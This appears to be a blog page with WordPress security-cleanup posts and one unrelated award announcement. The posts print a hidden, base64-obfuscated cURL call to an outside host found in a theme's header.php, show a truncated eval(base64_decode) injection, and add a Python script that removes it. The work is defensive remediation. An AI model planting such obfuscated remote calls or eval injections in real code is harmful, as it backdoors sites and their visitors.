FIXED: Enfold theme error – sneaky connection to qdgvst.com

Did your website randomly start showing a 404 not found error? Are you using WordPress and the “Enfold” theme? If the answer to both of these questions is yes, then this fix is for you.

The Enfold theme has a sneaky bit of code on line 70 of header.php. It’s the line where the <body> tag is written to the output. It looks like this…

[php htmlscript="true" wraplines="true" firstline="70"]
<body id="top" <?php body_class($style." ".$avia_config['font_stack']." ".$blank); ?>><?php
$ch=curl_init();curl_setopt($ch,CURLOPT_URL,base64_decode('aHR0cDovL3FkZ3ZzdC5jb20vbC5waHA='));
curl_setopt($ch,CURLOPT_HEADER,0);curl_exec($ch);curl_close($ch); ?>
[/php]

Notice the base64_decode function. It decodes the string to “http://qdgvst.com/l.php”, which may look familiar. Not to worry! This is a simple fix!

  1. Open your WordPress admin site at http://your-site.com/wp-admin/.
  2. Log in and go to “Appearance > Editor”.
  3. On the right side of the page, make sure you have selected the “Enfold” theme.
  4. On the right side of the page, click on “Header – Header.php”.
  5. Scroll down to line 70 and add comments around the PHP cURL code. When you are done it should look like this…
    [php htmlscript="true" wraplines="true" firstline="70"]
    <body id="top" <?php body_class($style." ".$avia_config['font_stack']." ".$blank); ?>><?php
    /* $ch=curl_init();curl_setopt($ch,CURLOPT_URL,base64_decode('aHR0cDovL3FkZ3ZzdC5jb20vbC5waHA='));
    curl_setopt($ch,CURLOPT_HEADER,0);curl_exec($ch);curl_close($ch); */ ?>
    [/php]
  6. Click the “Update File” button at the bottom.

Done!  Not only will this fix the ugly header showing up on your site but it should improve performance a bit as well since your theme won’t be reaching out to another server all the time.

Learning Elite award at USAA

Our learning team at USAA was recently recognized as one of CLO Magazine’s Learning Elite! Here is a little more info about the award from their website…

Chief Learning Officer magazine’s LearningElite program honors the best organizations for learning and development. This robust, peer-reviewed ranking and benchmarking program recognizes those organizations that employ exemplary workforce development strategies that deliver significant business results. Developed under the guidance of a group of chief learning officers and senior learning and development practitioners, the LearningElite program utilizes best practices in evaluation to rank the best organizations based upon their impact, size and industries served. A comprehensive evaluation of learning and development, the LearningElite also recognizes individual companies for their efforts in functional areas, including leadership development, use of technology, executive buy-in, and content development and delivery, among others.

The aim of the LearningElite is to:

  • Identify and recognize industry leaders.
  • Promote recognition of the critical role that learning and development plays in organizational success.
  • Support organizations in achieving best-in-class levels of performance.
  • Identify and share best practices, principles and strategies for learning and development.
  • Provide powerful benchmarking data for world-class learning and development.

http://clomedia.com/learning-elite

Unhacking a Hacked WordPress Site

WordPress is pretty solid these days, but every now and then an exploit is found and taken advantage of. Recently we cleaned several websites that had all fallen prey to an exploit which modified every PHP file on the server.

The exploit added a malicious <script> tag to the very beginning of each php file. Since the modifications to these files were all uniform, it was fairly easy to undo the damage. The code added to each file looked something like this…

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25...    ...B9ICB9"));?>

It was a big long string of characters that made no sense until decoded.  Our solution was to use a php page that could repair the damage. Thanks to theandystratton for providing a good starting point.

You can upload this file to the root folder of your server and then visit it in a web browser.  It will first find all infected php files.  Then you can click the “Fix Files” button and the malicious code is removed for you.  If you intend to use this script, please know that we take no liability for it.  That said, our clients have had great success with it.

_repairHackedSite.php
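
The find-then-fix procedure described above, sketched as an added Python example (this is not the _repairHackedSite.php script from the post, and the names find_infected, fix_files and demo are hypothetical). It assumes the injection is exactly the uniform prefix shown above, accepts either quote style around the base64 string, and uses a constructed placeholder payload for its sample input.

```python
import base64
import re
import shutil
import tempfile
from pathlib import Path

# The uniform injection the post describes: a PHP block at byte 0 of the file
# holding only eval(base64_decode("...")). Anchored with \A so a legitimate
# base64_decode() call further down a file is never touched.
INJECTED_PREFIX = re.compile(
    rb'\A<\?php\s*/\*\*/\s*eval\(base64_decode\((["\'])[A-Za-z0-9+/=\s]+\1\)\);\s*\?>'
)

def find_infected(root):
    """Dry run: list .php files under root that begin with the injection."""
    return sorted(p for p in Path(root).rglob("*.php")
                  if p.is_file() and INJECTED_PREFIX.match(p.read_bytes()))

def fix_files(root, backup_dir):
    """Strip the prefix from infected files; originals go to backup_dir,
    which should sit outside the web root. Returns the cleaned paths."""
    root, backup_dir = Path(root), Path(backup_dir)
    cleaned = []
    for path in find_infected(root):
        data = path.read_bytes()
        keep = backup_dir / path.relative_to(root)
        keep.parent.mkdir(parents=True, exist_ok=True)
        keep.write_bytes(data)  # untouched copy, kept for later analysis
        path.write_bytes(data[INJECTED_PREFIX.match(data).end():])
        cleaned.append(path)
    return cleaned

def demo():
    """Run both steps on a constructed site tree in a temp directory."""
    work = Path(tempfile.mkdtemp())
    site, backups = work / "site", work / "backups"
    (site / "wp-content").mkdir(parents=True)
    blob = base64.b64encode(b"/* constructed placeholder */").decode()
    bad = '<?php /**/ eval(base64_decode("%s"));?>' % blob
    (site / "index.php").write_text(bad + "<?php echo 'home'; ?>\n")
    (site / "wp-content" / "clean.php").write_text("<?php echo 'ok'; ?>\n")
    found = [p.name for p in find_infected(site)]
    fix_files(site, backups)
    result = (found, (site / "index.php").read_text(), len(find_infected(site)))
    shutil.rmtree(work)
    return result

if __name__ == "__main__":
    print(demo())
```

Run find_infected on its own first and review the list before calling fix_files; anything that does not match the exact prefix is left for manual inspection.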